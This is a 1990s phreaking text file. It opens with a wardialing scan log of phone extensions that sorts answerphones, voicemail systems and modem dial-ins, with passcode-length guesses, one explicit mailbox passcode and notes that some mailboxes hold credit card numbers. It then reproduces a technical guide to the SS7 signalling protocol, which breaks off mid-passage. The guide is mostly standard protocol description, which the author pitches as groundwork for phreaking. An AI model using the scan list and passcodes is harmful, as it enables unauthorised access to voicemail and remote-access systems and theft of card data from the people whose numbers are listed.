Answerphone p=?? 007 V 010 English Meridian Mail 3333-3333 011 V when busy BT Call Minder p=???? 015 V 018 V 021 V 022 V 023 English Meridian Mail 024 Company recording 029 Answerphone p=20 032 Answerphone p=?? 036 Dead then "This number is temporarily out of order" 038 VMS box 4501 smi * to get in to the box 039 NA 040 V 042 NA 044 Strange answerphone p=?? responds to keypresses by beeping 045 NA 046 M - User Name Verification User Name: 048 NA 049 V "hello metro jamline" 051 NA 053 NA 054 Fax 056 NA 057 NA 058 Answerphone p=?? * cuts to the beep 0 replays the ogm 066 V 068 Answerphone p=?? 070 General Accident put on hold crap music 073 M - No response 077 V 079 VMS 080 V 082 NA 083 M - No response 084 Recording "operator is busy" put on hold 086 "The number called has been changed to 0181 blah blah" 089 Fax 090 Answerphone p=?? Lampost repair line! 091 Fax 092 Answerphone p=2233 094 Recorded information on air pollution answerphone p=1122? 099 M - Garbage AT~*^ AT& 100 NA 102 NA 107 Answerphone p=1122 108 V 110 NA 111 M/F 114 M - Shiva Lanrover System @user id: 116 "This number has changed to 0702 1162518" 117 Answerphone p=112233 118 NA 119 "The number called has been changed to 01904 643355" 120 NA 121 NA 122 NA 124 NA 125 Answerphone press * for sercurity code prompt p=?? 126 Answerphone p=?? you get transfered after a few attempts 127 Answerphone p=?? plays a cool tune 128 B 129 V some bloke SHOUTS at you 130 Answerphone p=2233 end of tape? 131 NA 132 V 133 Weird recording!? "No information available 807 bye" 134 Answerphone press * for security code prompt p=?? 136 V "HELLO!" 139 Shitty VMS i can't get a mailbox? prompt 140 NA 141 Recording "This service is currently unavailable" 142 V 143 Shit answerphone 145 V 146 Answerphone p=?? 147 NA 148 V 149 NA 151 NA 152 M - Garbage 153 V 155 Company recording 157 M - Garbage 161 Fax 162 NA 164 NA 165 Fucked up answerphone 166 Answerphone p=?? 168 V 171 NA 174 Answerphone for a mobile phone with the number 0402 663083 press * for a security code prompt 4 digits 175 NA 177 NSPCC recording maybe an answerphone there 179 NA 180 Answerphone p=?? 182 NA 186 V 187 Forwarded to VMS 'Voice Connector' 188 Airtours crew delay line for Manchester 191 Put on hold, Shitehouse Family hold music 199 Answerphone p=??? three digit 201 Put on hold, no music! 202 V 203 B 204 M - Garbage  205 Answerphone p=?? 206 V 208 V 209 NA 210 NA 211 NA 212 Fax 214 Answerphone p=?? 216 NA 220 NA 221 Answerphone p=?? 222 English Meridian Mail direct to box 4502 224 V 225 M - Garbage +++ 226 Answerphone p=?? 227 NA 228 NA 230 NA 231 NA 233 V 236 Forwarded to a fax 240 NA 243 NA 244 English Meridian Mail direct to box 4504 same system as above 245 NA 248 Answerphone p=*? after pressing * it responds to keypresses 249 Answerphone p=*? same as above 250 NA 254 NA 255 NA 258 V 259 Answerphone p=?? messages will have cc#'s on them 260 NA 261 Orange answerphone can't get a passcode? prompt 262 NA 268 NA 269 Answerphone 270 Answerphone p=?? 271 It says it's a voice mail system but it hangs up on keypresses 273 V "Hello, Jamline" 274 Answerphone p=?? 275 GAP VMS AUDIX couldn't locate the boxes 277 Airtours crew delay line for London Gatwick 280 V Sounded like a mobile phone or payphone 283 NA 285 M - No response 286 M - No response 287 M - No response 288 English Meridian Mail direct to box 4505 same system as above 289 VMS box 1000 290 NA 291 M - No resonse 292 NA 293 B 294 NA 295 PABX Peoples Bank 296 V Peoples Bank 300 Answerphone p=?? 301 Stolen Credit Card Report Centre English Meridian Mail they must have disable it coz you press # to stop recording but it won't give you a mailbox? prompt 303 Answerphone p=?? 305 NA 306 NA 307 NA 308 Answerphone p=3345? around 2345 area 309 NA 311 English Meridian Mail direct to box 4506 same system as above 312 Answerphone p=#? i think # gets you in 313 Answerphone p=1?11? 316 Fax 317 Answerphone p=?? 320 Answerphone p=*? press * then it responds to keypresses 321 English Meridian Mail 322 Answerphone p=?? 325 NA 326 Answerphone p=?? # does something 327 NA 328 Answerphone/VMS p=?? it hangs up if you press * or # 329 NA 330 VMS AUDIX 5 digit boxes 331 VMS AUDIX 5 digit boxes 332 Company recording 333 Answerphone p=??? * to get security code? prompt 3 digits 334 Fax 336 Weird recording loop "we can't recognize this mailbox number" 337 M - Enter Your User Name: quite a few attempts 338 NA 339 VMS AUDIX 5 digit boxes 340 NA 341 NA 342 BT Answerphone p=#? 343 V 347 "It has not been possible to connect your call" 353 Answerphone p=?? 355 English Meridian Mail direct to box 4507 same system as above 356 Answerphone p=?? # does something 357 Answerphone p=?? * forwards you to somewhere? 359 Answerphone p=?? 360 M - Garbage g~ 361 M - Garbage *n~ 362 V 365 NA 366 Airtours crew delay line for Bristol 367 Answerphone p=?? 369 NA 370 V 371 PABX x100 x111 NA 372 NA 373 NA 377 NA 378 M - Call has been intercepted by Defender Security Sever ID: 381 NA 385 Answerphone p=?? cool tune 386 NA 390 V 391 Answerphone p=?? messages will have cc#'s on them 392 M - Garbage +++ 394 Answerphone p=?? cool tune 395 V 396 Answerphone p=?? 397 NA 398 Weird DTMF tones then answerphone p=?? 399 V BT! - All numbers between 400 and 499 emit a weird tone 501 NA 503 V 506 V 508 Forwarded to V 509 NA 511 Answerphone p=?? cool tune 514 Answerphone p=?? cool tune 516 NA 518 BT call minder 520 Answerphone p=?? cool tune 522 V 524 NA 526 NA 527 NA 528 NA 535 Recorded message 540 Answerphone p=?? 543 NA 544 Airtours crew delay line for Belfast 546 Fax 548 M - Shiva Lanrover @ userid: 549 V 552 Answerphone p=22/33area 553 Answerphone p=?? 554 V 555 Answerphone p=31/32/33 558 Call waiting then V 560 VMS press # infinate attempts but i couldn't find any boxes 561 Forwarded to a fax 562 Answerphone p=4455area 567 NA 568 English Meridian Mail direct to box 2254 00,50,51,53,55,56 570 Answerphone p=12? 572 Fax 575 M - Annex Command Line Interpreter - Annex Username: 576 V 582 NA 583 NA 584 Fax 585 Answerphone press # then it responds to keypresses 587 Answerphone press # for a security code? prompt 5 digits 588 VMS AUDIX 5 digit boxes 591 BT recorded message 592 NA 593 V 'student village' 595 AA shitty PABX 596 English Meridian Mail 4444 40 39 38 36 4794 597 NA 599 Fax 602 V 603 Freephone dating service 608 English Meridian Mail direct to box 445 444 443- 440- 446- 447- 610 V 611 Airtours crew delay line for Newcastle and Glasgow 613 Recording "We are currently updating the system" 614 M - No response 616 NA 618 B 619 Answerphone p=?? one digit? 621 Forwarded to an op who asks for your message 622 NA 623 Recording "We are currently updating the system" 625 Answerphone p=?? 627 BT Call Minder 628 NA 630 Answerphone p=?? sounded like it ran out of tape 631 Answerphone p=?? messages will have cc#'s on them 633 Freephone Dating Service 634 NA 635 VMS Phonemail box 322 636 NA 637 Answerphone p=?? 639 Answerphone p=?? 642 Answerphone press # responds to keypresses 643 Freephone dating service 644 M - No response 645 NA 646 NA 649 NA 651 NA 653 V 654 V woman asks if she can take your message 655 NA 657 Answerphone press * then it responds to keypresses 658 Recording "We're sorry an error has occured" 659 Same as above 660 Saga PABX shit 661 NA 662 Answerphone p=?? 663 V 667 BT call minder 668 Answerphone p=?? messages will have cc#'s on them 669 NA 670 V 672 B&Q answerphone p=0 675 Answerphone p=456area 677 Answerphone p=?? 678 Company recording 679 PABX crappy job vacancy thing 681 Answerphone * to get security code prompt p=? one or two digits 684 NA 685 Answerphone p=?? * hangs up 689 NA 690 Answerphone p=16/17 692 NA 693 Recording "this service is being updated" 694 Freephone dating service 695 Same as above 696 VMS box 540 crappy system 699 NA 700 V 703 V 704 VMS AUDIX 4 digit boxes 705 Answerphone # for security code? prompt 708 NA 709 Answerphone * for security code 717 BT recording 719 NA 720 V 721 Answerphone for a vodaphone number 0467 764224 passcode 9999 722 Fax 723 NA 724 NA 728 VMS pretty shite 729 Answerphone p=?? 730 "This is AT&T Communications, number not available" 733 Fax 735 NA 737 Answerphone * for security code prompt 738 NA 739 NA 740 NA 742 English Meridian Mail direct to box 6208 744 BT Call Minder 746 WEiRD beeps on pickup then nothing, conference loop? maybe 748 NA 749 Answerphone p=?? 752 V 754 V 755 VMS AUDIX 5 digits boxes 756 NA 759 Answerphone p=?? 760 Fax 761 V 762 V 763 NA 764 V 765 Answerphone p=?? 766 Answerphone p=?? someone picked up? 768 V 771 V 774 Answerphone p=?? 776 NA 780 V 781 Answerphone p=?? 783 Answerphone p=10 787 M 788 NA 790 Company recording 792 VMS AUDIX 793 NA 794 Company recording 795 Company recording 796 Company recording 797 NA 799 Airtours crew delay line for East Midlands 800 Company recording 804 Answerphone p=?? 805 Company recording 806 Company recording 808 NA 811 NA 812 NA 814 Company recording 815 NA 816 NA 817 V 818 NA 819 NA 821 "You are being forwarded to a vms but the user at extension 4888 does not subscribe to this service" 822 V 824 NA 825 PBX press 3 for an English Meridian Mail 828 Answerphone p=?? 829 Company recording 830 NA 833 WEiRD beeped on pick up then nothing 835 NA 836 NA 838 NA 839 Company recording 842 NA 843 BT Helpdesk answerphone, press * for security code? prompt 845 V 847 V 849 Company recording 850 NA 851 VMS press # for mailbox? prompt 855 V "good morning jam line" 856 Answerphone 857 NA 859 Company recording 861 Royal Bank of Scotland answerphone * does something 863 NA 865 "The person you are calling is not accepting annonymous calls, please redial without witholding your number" 866 Same as above 867 And again 868 And again 869 Answerphone p=?? 872 Answerphone BAD quality recording, cool tune, * does something 874 NA 875 NA 876 Company recording 877 NA 878 "The person you are calling is temperarily unavailable, please try later" 879 "The number called has been changed to 0171 9037001" 880 NA 882 BT recording "This service is not compatible with this call" 884 M 885 M 887 NA 888 Airtours crew delay line for Leeds, Bradford, Humberside, Aberdeen, Bournmouth and Edinburgh 891 Forwarded to the 121 Voice Mail Service crap 892 VMS same system as above 895 V 897 NA 900 Company recording - very sad 902 NA 905 B 906 Company recording 907 NA 908 Answerphone p=?? 912 M 913 VMS OCTEL Direct 3 digit boxes 914 NA 917 Answerphone p=?? 919 Answerphone p=?? 920 V 922 Answerphone p=?? 923 V "Hello?" 924 M 925 NA 927 Answerphone p=?? 928 Same as above 930 VMS AUDIX 933 NA 934 BT "Calls to this number are being diverted" V 935 Answerphone p=?? 937 V indian bloke actually started singing "bud bud ding ding" 940 Answerphone p=?? * does something 941 Answerphone p=?? 944 Recording "No information available 806 bye" 946 Company recording 947 M/f 949 NA 950 Answerphone p=?? 956 NA 958 V 959 Answerphone p=?? 960 NA 962 NA 963 BT Call Minder 965 NA 966 NA 968 V 969 V 971 NA 972 V 973 NA 974 NA 976 NA 978 Answerphone p=?? 980 NA 981 Answerphone p=?? 983 Answerphone p=?? messages will have cc #'s on 986 NA 987 VMS AUDIX 5 digits 989 Some crap recording about rewards 993 M 994 Answerphone p=?? sounds like Mystic Meg 996 NA 997 Answerphone p=?? 998 NA shoutz: Bodie + Hybrid + Chimmy + Zomba + Downtime + All of the D4RKCYDE crew ____________________________________________ _/ __________ _______ _ ______ _____/ \ __\ / | \| _/ \ | __|_ | | / | \ | \ \____| \ |__| \_________/____|___/\________/_________/ "so, i've decided to take my work back underground, to stop it falling into the wrong hands..." force007@hotmail.com O8OO 919355 direct to vmb iCQ 21O63199 ---(OOooOO)--------Switching System Number 7-SS7------------------------(OOo- ---(OOooOO)--------by hybrid--------------------------------------------(OOo- ---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo- _________ _________ _________________________ / | / | | | / __ | / __ ::: | / / | | / / | | |_______________ | / / |___| / / |___| / / / /____________ / /____________ / / | :: | / / |_____________ ||_____________ | / / ___ | | ___ | | / / | |_________| || |_________| | / / | :: | / | |___________________/ |___________________/ /____________| Switching System Number 7 (SS7) A Guide to the SS7 Telephony Protocol. April 1999. By Hybrid. (th0rn@coldmail.com) (hybrid_blue@hotmail.com) Everyone is still talking about 5ESS, and 1AESS switch programing. Whatever country you live in, Switching System 7 has been, or _will_ be implemented. I have written a load of files on the various protocols of SS7, and it's many applications. I have written this file as a guide to the SS7 system, and it's network layout. This is _new_ information, not old 5ESS stuff. People are still going on about 5ESS and how they can hack ESS switches. Bull Shit, SS7 is the new system, it's time that phreaks started to look into this massive new network instead of lingering in the past. Before my time, phreaks could _phreak_ using just a phone, now if you want to take a CO, or switch, you have to hack it. Since the advent of CCS (Common Channel Signaling), you cannot interact with the phone network because the signaling and voice data are handled on seperate networks. If phreaking is going anywhere, it is heading towards SS7 and AIN Frame Relay. I have obtained some information on the SS7 system from Bellcore and other majour telco players. After reading the information (from books), I have decied to type it all up into a file for everyone to read. The information I have on SS7 is all in paper format, so I have mearly copied it all into digital format, the way in which it should be. SS7 is a relatively complicated protocol to grasp, but if no one bothers with it _real_ phreaking will die. I hope everyone enjoys reading this file as much as I enjoyed typing it up, all the information in this file has been taken from technical books and journals, apart from the asci diagrams which I have made to make the info easier to understand. Index: Signaling System 7 (SS7) 1. What is Signaling? 2. What is Out-of-Band Signaling? 3. Signaling Network Architecture. 4. The North American Signaling Architecture 5. Basic Signaling Architecture 6. SS7 Link Types 7. Basic Call Setup Example 8. Database Query Example 9. Layers of the SS7 Protocol 10. What Goes Over the Signaling Link 11. Addressing in the SS7 Network 12. Signal Unit Structure 13. What are the Functions of the Different Signaling Units? 14. Message Signal Unit Structure 15. Acronym List 1. What is Signaling? Signaling refers to the exchange of information between call components required to provide and maintain service. As users of the public switched telephone network, we exchange signaling with network elements all the time. Examples of signaling between a telephone user and the telephone network include: dialing digits, providing dial tone, accessing a voice mailbox, sending a call-waiting tone, dialing *66 (to retry a busy number), etc. Signaling System 7 is a means by which elements of the telephone network exchange information. Information is conveyed in the form of messages. Signaling System 7 messages can convey information such as: I am forwarding to you a call placed from 212-555-1234 to 718-555-5678. Look for it on trunk 067. Someone just dialed 800-555-1212. Where do I route the call? The called subscriber for the call on trunk 11 is busy. Release the call and play a busy tone. The route to XXX is congested. Please don't send any messages to XXX unless they are of priority 2 or higher. I am taking trunk 143 out of service for maintenance. SS7 is characterized by high-speed packet data, and out-of-band signaling. 2. What is Out-of-Band Signaling? Out-of-band signaling is signaling that does not take place over the same path as the conversation. We are used to thinking of signaling as being in-band. We hear dial tone, dial digits, and hear ringing over the same channel on the same pair of wires. When the call completes, we talk over the same path that was used for the signaling. Traditional telephony used to work in this way as well. The signals to set up a call between one switch and another always took place over the same trunk that would eventually carry the call. Signaling took the form of a series of multifrequency (MF) tones, much like touch tone dialing between switches. Out-of-band signaling establishes a separate digital channel for the exchange of signaling information. This channel is called a signaling link. Signaling links are used to carry all the necessary signaling messages between nodes. Thus, when a call is placed, the dialed digits, trunk selected, and other pertinent information are sent between switches using their signaling links, rather than the trunks which will ultimately carry the conversation. Today, signaling links carry information at a rate of 56 or 64 kilobits per second (kbps). It is interesting to note that while SS7 is only used for signaling between network elements, the ISDN D channel extends the concept of out-of-band signaling to the interface between the subscriber and the switch. With ISDN service, signaling that must be conveyed between the user station and the local switch is carried on a separate digital channel called the D channel. The voice or data which comprise the call is carried on one or more B channels. Why Out-of-Band Signaling? Out-of-band signaling has several advantages that make it more desirable than traditional in-band signaling: It allows for the transport of more data at higher speeds (56 kbps can carry data much faster than MF outpulsing). It allows for signaling at any time in the entire duration of the call, not only at the beginning. It enables signaling to network elements to which there is no direct trunk connection. 3. Signaling Network Architecture If signaling is to be carried on a different path than the voice and data traffic it supports, then what should that path look like? The simplest design would be to allocate one of the paths between each interconnected pair of switches as the signaling link. Subject to capacity constraints, all signaling traffic between the two switches could traverse this link. This type of signaling is known as associated signaling, and is shown below in Figure 1. Figure 1: Associated Signaling Associated signaling works well as long as a switches only signaling requirements are between itself and other switches to which it has trunks. If call setup and management was the only application of SS7, associated signaling would meet that need simply and efficiently. In fact, much of the out-of-band signaling deployed in Europe today uses associated mode. The North American implementers of Signaling System 7, however, wanted to design a signaling network that would enable any node to exchange signaling with any other SS7-capable node. Clearly, associated signaling becomes much more complicated when it is used to exchange signaling between nodes which do not have a direct connection. From this need, the North American Signaling System 7 architecture was born. 4. The North American Signaling Architecture The North American signaling architecture defines a completely new and separate signaling network. The network is built out of three essential components, interconnected by signaling links. These components are signal switching points (SSPs), signal transfer points (STPs), and signal control points (SCPs). They are outlined in Table 1 below. Table 1: North American Signaling Architecture Components Component Function Signal switching points (SSPs) SSPs are telephone switches (end offices or tandems) equipped with SS7-capable software and terminating signaling links. They generally originate, terminate, or switch calls. Signal transfer points (STPs) STPs are the packet switches of the SS7 network. They receive and route incoming signaling messages towards the proper destination. They also perform specialized routing functions. Signal control points (SCPs) SCPs are databases that provide information necessary for advanced call-processing capabilities. Once deployed, the availability of the SS7 network is critical to call processing. Unless SSPs can exchange signaling, they cannot complete any interswitch calls. For this reason, the SS7 network is built using a highly redundant architecture. Each individual element must also meet exacting requirements for availability. Finally, protocol has been defined between interconnected elements to facilitate the routing of signaling traffic around any difficulties that may arise in the signaling network. To enable signaling network architectures to be easily communicated and understood, a standard set of symbols was adopted for depicting SS7 networks. Figure 2 shows the symbols that are used to depict these three key elements of any SS7 network. STPs and SCPs are customarily deployed in pairs. While elements of a pair are not generally co-located, they work redundantly to perform the same logical function. When drawing complex network diagrams, these pairs may be depicted as a single element for simplicity, as shown in Figure 3. Figure 3: STP and SCP Pairs 5. Basic Signaling Architecture Figure 4 shows a small example of how the basic elements of an SS7 network are deployed to form two interconnected networks. Figure 4: Sample Network Several points should be noted: 1.STPs W and X perform identical functions. They are redundant. Together, they are referred to as a mated pair of STPs. Similarly, STPs Y and Z form a mated pair. 2.Each SSP has two links (or sets of links), one to each STP of a mated pair. All SS7 signaling to the rest of the world is sent out over these links. Because the STPs of a mated pair are redundant, messages sent over either link (to either STP) will be treated equivalently. 3.The STPs of a mated pair are joined by a link (or set of links). 4.Two mated pairs of STPs are interconnected by four links (or sets of links) These links are referred to as a quad. 5.SCPs are usually (though not always) deployed in pairs. As with STPs, the SCPs of a pair are intended to function identically. Pairs of SCPs are also referred to as mated pairs of SCPs. Note that they are not directly joined by a pair of links. Signaling architectures such as this, which provide indirect signaling paths between network elements, are referred to as providing quasi-associated signaling. 6. SS7 Link Types SS7 signaling links are characterized according to their use in the signaling network. Virtually all links are identical in that they are 56-kbps or 64- kbps bi-directional data links that support the same lower layers of the protocol; what is different is their use within a signaling network. The defined link types are shown in Figure 5 below and defined as follows: Figure 5: Link Types A Links A links are links that interconnect an STP and either an SSP or an SCP, which are collectively referred to as signaling end points ("A" is intended to stand for access). A links are used for the sole purpose of delivering signaling to or from the signaling end points (they could just as well be referred to as signaling beginning points). Examples of A links are 2-8, 3-7, and 5-12 in Figure 5. Signaling that an SSP or SCP wishes to send to any other node is sent on either of its A links to its "home" STP, which, in turn, processes or routes the messages. Similarly, messages intended for an SSP or SCP will be routed to one of its "home" STPs, which will forward them to the addressed node over its A links. C Links C links are links that interconnect mated STPs. As will be seen later, they are used to enhance the reliability of the signaling network in instances where one or several links are unavailable. "C" stands for cross. (7-8, 9-10 and 11-12 are C links.) B Links, D Links, and B/D Links Links interconnecting two mated pairs of STPs are referred to as either B links, D links, or B/D links. Regardless of their name, their function is to carry signaling messages beyond their initial point of entry to the signaling network towards their intended destination. The "B" stands for bridge and is intended to describe the quad of links interconnecting peer pairs of STPs. The "D" denotes diagonal and is intended to describe the quad of links interconnecting mated pairs of STPs at different hierarchical levels. Because there is no clear hierarchy associated with a connection between networks, interconnecting links are referred to as either B, D, or B/D links. (7-11 and 7-12 are examples of B links; 8-9 and 7-10 are examples of D links; 10-13 and 9-14 are examples of interconnecting links and can be referred to as B, D, or B/D links.) E Links While an SSP is connected to its "home" STP pair by a set of "A" links, enhanced reliability can be provided by deploying an additional set of links to a second STP pair. These links, called "E" (extended) links provide backup connectivity to the SS7 network in the event that the "home" STPs cannot be reached via the "A" links. While all SS7 networks include "A," "B/D," and "C" links, "E" links may or may not be deployed at the discretion of the network provider, The decision of whether or not to deploy "E" links can be made by comparing the cost of deployment with the improvement in reliability. (1-11 and 1-12 are E links.) F Links "F" (for fully associated) links are links which directly connect two signaling end points. F links allow associated signaling only. Because they _bypass_ the security features provided by an STP, F links are not generally deployed between networks. Their use within an individual network is at the discretion of the network provider. (1-2 is an F link.) 7. Basic Call Setup Example Before going into much more detail, it might be helpful to look at several basic calls and the way in which they use SS7 signaling (see Figure 6). Figure 6: Call Setup Example In this example, a subscriber on switch A places a call to a subscriber on switch B: 1.Switch A analyzes the dialed digits and determines that it needs to send the call to switch B. 2.Switch A selects an idle trunk between itself and switch B and formulates an initial address message (IAM), the basic message necessary to initiate a call. The IAM is addressed to switch B. It identifies the initiating switch (switch A), the destination switch (switch B), the trunk selected, the calling and called numbers, as well as other information beyond the scope of this example. 3.Switch A picks one of its A links (say AW) and transmits the message over the link for routing to switch B. 4.STP W receives a message, inspects its routing label, and determines that it is to be routed to switch B. It transmits the message on link BW. 5.Switch B receives the message. On analyzing the message, it determines that it serves the called number and that the called number is idle. 6.Switch B formulates an address complete message (ACM), which indicates that the IAM has reached its proper destination. The message identifies the recipient switch (A), the sending switch (B), and the selected trunk. 7.Switch B picks one of its A links (say BX) and transmits the ACM over the link for routing to switch A. At the same time, it completes the call path in the backwards direction (towards switch A), sends a ringing tone over that trunk towards switch A, and rings the line of the called subscriber. 8.STP X receives the message, inspects its routing label, and determines that it is to be routed to switch A. It transmits the message on link AX. 9.On receiving the ACM, switch A connects the calling subscriber line to the selected trunk in the backwards direction (so that the caller can hear the ringing sent by switch B). 10.When and/or if the called subscriber picks up the phone, switch B formulates an answer message (ANM), identifying the intended recipient switch (A), the sending switch (B), and the selected trunk. 11.Switch B selects the same A link it used to transmit the ACM (link BX) and sends the ANM. By this time, the trunk must also be connected to the called line in both directions (to allow conversation). 12.STP X recognizes that the ANM is addressed to switch A and forwards it over link AX. 13.Switch A ensures that the calling subscriber is connected to the outgoing trunk (in both directions) and that conversation can take place. 14.If the calling subscriber hangs up first (following the conversation), switch A will generate a release message (REL) addressed to switch B, identifying the trunk associated with the call. It sends the message on link AW. 15.STP W receives the REL, determines that it is addressed to switch B, and forwards it using link WB. 16.Switch B receives the REL, disconnects the trunk from the subscriber line, returns the trunk to idle status, generates a release complete message (RLC) addressed back to switch A, and transmits it on link BX. The RLC identifies the trunk used to carry the call. 17.STP X receives the RLC, determines that it is addressed to switch A, and forwards it over link AX. 18.On receiving the RLC, switch A idles the identified trunk. 8. Database Query Example People generally are familiar with the toll-free aspect of 800 (or 888) numbers, but these numbers have significant additional capabilities made possible by the SS7 network. 800 numbers are "virtual" telephone numbers. Although they are used to point to "real" telephone numbers, they are not assigned to the subscriber line itself. When a subscriber dials an 800 number, it is a signal to the switch to suspend the call and seek further instructions from a database. The database will provide either a real phone number to which the call should be directed, or it will identify another network (e.g., a long-distance carrier) to which the call should be routed for further processing. While the response from the database could be the same for every call (as, for example, if you have a personal 800 number), it can be made to vary based on the calling number, the time of day, the day of the week, or a number of other factors. The following example shows how an 800 call is routed (see Figure 7). Figure 7: Database Query Example 1.A subscriber served by switch A wants to reserve a rental car at a company's nearest location. She dials the company's advertised 800 number. 2.When the subscriber has finished dialing, switch A recognizes that this is an 800 call and that it requires assistance to handle it properly. 3.Switch A formulates an 800 query message including the calling and called number and forwards it to either of its STPs (e.g., X) over its A link to that STP (AX). 4.STP X determines that the received query is an 800 query and selects a database suitable to respond to the query (e.g., M). 5.STP X forwards the query to SCP M over the appropriate A link (MX). 6.SCP M receives the query, extracts the passed information, and (based on its stored records) selects either a "real" telephone number or a network (or both) to which the call should be routed. 7.SCP M formulates a response message with the information necessary to properly process the call, addresses it to switch A, picks an STP and an A link to use (e.g., MW), and routes the response. 8.STP W receives the response message, recognizes that it is addressed to switch A, and routes it to A over AW. 9.Switch A receives the response and uses the information to determine where the call should be routed. It then picks a trunk to that destination, generates an initial address message (IAM), and proceeds (as it did in the previous example) to set up the call. 9. Layers of the SS7 Protocol As the call-flow examples show, the SS7 network is an interconnected set of network elements that is used to exchange messages in support of telecommunications functions. The SS7 protocol is designed to both facilitate these functions and to maintain the network over which they are provided. Like most modern protocols, the SS7 protocol is layered. The underlying layers of the SS7 protocol are as follows: Physical Layer This defines the physical and electrical characteristics of the signaling links of the SS7 network. Signaling links utilize DS0 channels and carry raw signaling data at a rate of 56 kbps or 64 kbps (56 kbps is the more common implementation). Message Transfer Part - Level 2 The level 2 portion of the message transfer part (MTP Level 2) provides link-layer functionality. It ensures that the two end points of a signaling link can reliably exchange signaling messages. It incorporates such capabilities as error checking, flow control, and sequence checking. Message Transfer Part - Level 3 The level 3 portion of the message transfer part (MTP Level 3) extends the functionality provided by MTP level 2 to provide network layer functionality. It ensures that messages can be delivered between signaling points across the SS7 network regardless of whether they are directly connected. It includes such capabilities as node addressing, routing, alternate routing, and congestion control. Collectively, MTP levels 2 and 3 are referred to as the message transfer part (MTP). Signaling Connection Control Part The signaling connection control part (SCCP) provides two major functions that are lacking in the MTP. The first of these is the capability to address applications within a signaling point. The MTP can only receive and deliver messages from a node "as a whole", it does not deal with software applications within a node. While MTP network management messages and basic call-setup messages are addressed to a node as a whole, other messages are used by separate applications (referred to as subsystems) within a node. Examples of subsystems are 800 call processing, calling-card processing, advanced intelligent network, and CLASS services (e.g., Repeat Dialing and Call Return). The SCCP allows these subsystems to be addressed explicitly. Global Title Translation The second function provided by the SCCP is the ability to perform incremental routing using a capability called global title translation. Global title translation frees originating signaling points from the burden of having to know every potential destination to which they might have to route a message. A switch can originate a query, for example, and address it to an STP along with a request for global title translation. The receiving STP can then examine a portion of the message, make a determination as to where the message should be routed, and then route it. For example, calling-card queries (used to verify that a call can be properly billed to a calling card) must be routed to an SCP designated by the company that issued the calling card. Rather than maintaining a nationwide database of where such queries should be routed (based on the calling-card number), switches generate queries addressed to their local STPs, which, using global title translation, select the correct destination to which the message should be routed. Note that there is no magic here; STPs must maintain a database that enables them to determine to where a query should be routed. Global title translation effectively centralizes the problem and places it in a node (the STP) that has been designed to perform this function. In performing global title translation, an STP does not need to know the exact final destination of a message. It can, instead, perform "intermediate global title translation," in which it uses its tables to find another STP further along the route to the destination. That STP, in turn, can perform "final global title translation," routing the message to its actual destination. Intermediate global title translation minimizes the need for STPs to maintain extensive information about nodes which are far removed from them. Global Title Translation is also used at the STP to share load among mated SCPs in both normal and failure scenarios. In these instances, when messages arrive at an STP for final global title translation and routing to a database, the STP can select from among available redundant SCPs. It can select an SCP on either a priority basis (referred to as primary -- backup) or so as to equalize the load across all available SCPs (referred to as load sharing). ISDN User Part (ISUP) The ISDN user part defines the messages and protocol used in the establishment and tear down of voice and data calls over the public switched network, and to manage the trunk network on which they rely. Despite its name, ISUP is used for both ISDN and non-ISDN calls. In the North American version of SS7, ISUP messages rely exclusively on MTP to transport messages between concerned nodes. Transaction Capabilities Application Part (TCAP) The transaction capabilities application part defines the messages and protocol used to communicate between applications (deployed as subsystems) in nodes. It is used for database services such as calling card, 800, and AIN as well as switch-to-switch services including Repeat Dialing and Call Return. Because TCAP messages must be delivered to individual applications within the nodes they address, they use the SCCP for transport. Operations, Maintenance and Administration Part (OMAP) The operations, maintenance, and administration part defines messages and protocol designed to assist administrators of the SS7 network. To date, the most fully developed and deployed of these capabilities are procedures for validating network routing tables and for diagnosing link troubles. OMAP includes messages that use both the MTP and SCCP for routing. 10. What Goes Over the Signaling Link Signaling information is passed over the signaling link in messages, which are called signal units (SUs). Three types of signal units are defined in the SS7 protocol: Message signal units (MSUs) Link status signal units (LSSUs) Fill-in signal units (FISUs) Signal units are transmitted continuously in both directions on any link that is in service. A signaling point that does not have MSUs or LSSUs to send will send FISUs over the link. The FISUs perform the function suggested by their name; they "fill up" the signaling link until there is a need to send purposeful signaling. They also facilitate link transmission monitoring and the acknowledgment of other SUs. All transmission on the signaling link is broken up into 8-bit bytes, referred to as octets. Signal units on a link are delimited by a unique 8-bit pattern known as a flag. The flag is defined as the 8-bit pattern "01111110". Because of the possibility that data within a signal unit would contain this pattern, bit manipulation techniques are used to ensure that the pattern does not occur within the message as it is transmitted over the link. (The signal unit is reconstructed once it has been taken off the link, and any bit manipulation is reversed.) Thus, any occurrence of the flag on the link indicates the end of one signal unit and the beginning of another. While in theory two flags could be placed between SUs (one to mark the end of the current message and one to mark the start of the next message), in practice a single flag is used for both purposes. 11. Addressing in the SS7 Network Every network must have an addressing scheme, and the SS7 network is no different. Network addresses are required so that a node can exchange signaling nodes to which it does not have a physical signaling link. In SS7, addresses are assigned using a three level hierarchy. Individual signaling points are identified as belonging to a "cluster" of signaling points. Within that cluster, each signaling point is assigned a "member" number. Similarly, a cluster is defined as being part of a "network." Any node in the American SS7 network can be addressed by a three-level number defined by its network, cluster, and member numbers. Each of these numbers is an 8-bit number and can assume values from 0 to 255. This three-level address is known as the "point code" of the signaling point. Network numbers are assigned on a nationwide basis by a neutral party. Regional Bell operating companies (RBOCs), major Independent telephone companies and interexchange carriers already have network numbers assigned. Since network numbers are a relatively scarce resource, companies' networks are expected to meet certain size requirements in order to be assigned a network number. Smaller networks can be assigned one or more cluster numbers within network numbers 1, 2, 3, and 4. The smallest networks are assigned "point codes" within "network number" 5. The cluster to which they are assigned is determined by the state in which they are located. The network number 0 is not available for assignment and network number 255 is reserved for future use. In short, "point code" is the term used to describe the three-level address number created by combining the network, cluster, and member numbers. A point code uniquely identifies a signaling point within the American SS7 network and is used whenever it is necessary to address that signaling point. 12. Signal Unit Structure Signal units of each type follow a format unique to that type. A high-level view of those formats is shown in Figure 8. Figure 8: Signaling Unit Formats All three SU types have a set of common fields that are used by MTP Level 2. They are as follows: Flag Flags delimit SUs. A flag marks the end of one SU and the start of the next. Checksum The checksum is an 8-bit sum intended to verify that the SU has passed across the link error-free. The checksum is calculated from the transmitted message by the transmitting signaling point and inserted in the message. On receipt, it is recalculated by the receiving signaling point. If the calculated result differs from the received checksum, the received SU has been corrupted. A retransmission is requested. Length Indicator The length indicator indicates the number of octets between itself and the checksum. It serves both as a check on the integrity of the SU and as a means of discriminating between different types of SUs at level 2. As can be inferred from Figure 8, FISUs have a length indicator of 0; LSSUs have a length indicator of 1 or 2 (currently all 